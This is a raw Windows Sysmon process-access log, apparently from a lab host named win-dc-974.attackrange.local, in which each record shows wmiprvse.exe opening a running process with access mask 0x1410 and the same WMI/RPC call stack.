16:54:42.217{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59D7-603E-CAA7-00000000AD01}15144C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241822Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.201{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59D7-603E-C9A7-00000000AD01}15528C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241821Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.201{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59C3-603E-C8A7-00000000AD01}15472C:\Windows\System32\rundll32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241820Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.201{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241819Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.201{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59BE-603E-C3A7-00000000AD01}15012C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241818Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.201{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-649E-603D-AC86-00000000AD01}7952C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241817Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.201{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-649E-603D-AB86-00000000AD01}5896C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241816Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.201{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-4090-603D-F281-00000000AD01}2992C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241815Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.201{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-4090-603D-F181-00000000AD01}1592C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241814Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.201{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB2E-603C-9079-00000000AD01}4328C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241813Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.201{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241812Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.201{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB20-603C-5D79-00000000AD01}1652C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241811Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.201{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241810Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.201{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7A5F-6039-4410-00000000AD01}2140C:\Windows\System32\rundll32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241809Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.201{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7949-6039-1B10-00000000AD01}5344C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241808Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.201{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7948-6039-1A10-00000000AD01}4808C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241807Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.201{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7947-6039-1910-00000000AD01}5136C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241806Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.201{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7947-6039-1810-00000000AD01}4892C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241805Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.201{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7946-6039-1610-00000000AD01}3144C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241804Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.201{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-76AE-6039-B70F-00000000AD01}5892C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241803Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 